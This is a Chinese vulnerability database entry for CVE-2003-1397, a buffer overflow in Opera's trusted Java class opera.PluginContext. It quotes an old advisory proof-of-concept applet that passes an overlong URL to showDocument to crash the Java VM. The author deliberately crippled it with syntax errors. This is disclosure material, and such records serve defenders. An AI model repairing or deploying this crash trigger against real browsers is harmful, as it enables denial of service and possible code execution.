Opera opera.PluginContext Native方法远程缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107155 漏洞类型 缓冲区溢出
发布时间 2003-01-13 更新时间 2003-12-31
CVE编号 CVE-2003-1397 CNNVD-ID CNNVD-200312-360
漏洞平台 Windows CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/22240
https://cxsecurity.com/issue/WLB-2007100076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-360
|漏洞详情
Opera是一款开放源代码的WEB浏览器。Opera包含的可信Java类('opera.PluginContext')存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户点击,使Opera产生缓冲区溢出,可能以Opera权限在系统上执行任意指令。Opera在opera.jar库中拥有自己的类文件,这些文件被系统策略认为是可信资源。但是Java类('opera.PluginContext')中包含的Native方法缺少正确的用户输入检查。利用PluginContext对象的showDocument方法调用包含超长字符串的URL对象,执行这个方法时,由于调用的'native'方法不能正确处理此值,而触发Java虚拟机崩溃,精心构建提交字符串可能以Opera进程权限在系统上执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/6814/info

Opera ships with a trusted Java class ('opera.PluginContext') that includes a native method that is reportedly prone to denial of service attacks. It is possible for a malicious Java applet to trigger this condition to cause a denial of service. This issue was reported in versions of Opera for Microsoft Windows operating systems. It is not known if other platforms are also affected. Java support must enabled for this issue to be present and can be disabled to prevent attacks. 

//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
//not runnable, a little crippled, there are couple of obvious syntax errors
to avoid script-kidding

...
import opera.PluginContext; // !! import the vulnerable class
...

public class OperaCall2 extends App1et
{
- -
- - public OperaCall2()
- - {
- - }
- -
- - public void paint(Graphics g)
- - {
- - PluginContext plugincontext = new PluginContext(l);
- - try
- - {
- - plugincontext.showDocument(new URL("http://xxx.xxx" + new
String(new byte[30000])));
- - }
- - catch(Exception exception)
- - {
- - exception.printStackTrace();
- - }
- - }
}
|参考资料

来源:XF
名称:opera-plugincontextshowdocument-bo(11280)
链接:http://xforce.iss.net/xforce/xfdb/11280
来源:BID
名称:6814
链接:http://www.securityfocus.com/bid/6814
来源:BUGTRAQ
名称:20030210Java-AppletcrashesOpera6.05and7.01
链接:http://www.securityfocus.com/archive/1/311214
来源:SREASON
名称:3255
链接:http://securityreason.com/securityalert/3255
来源:NSFOCUS
名称:4372
链接:http://www.nsfocus.net/vulndb/4372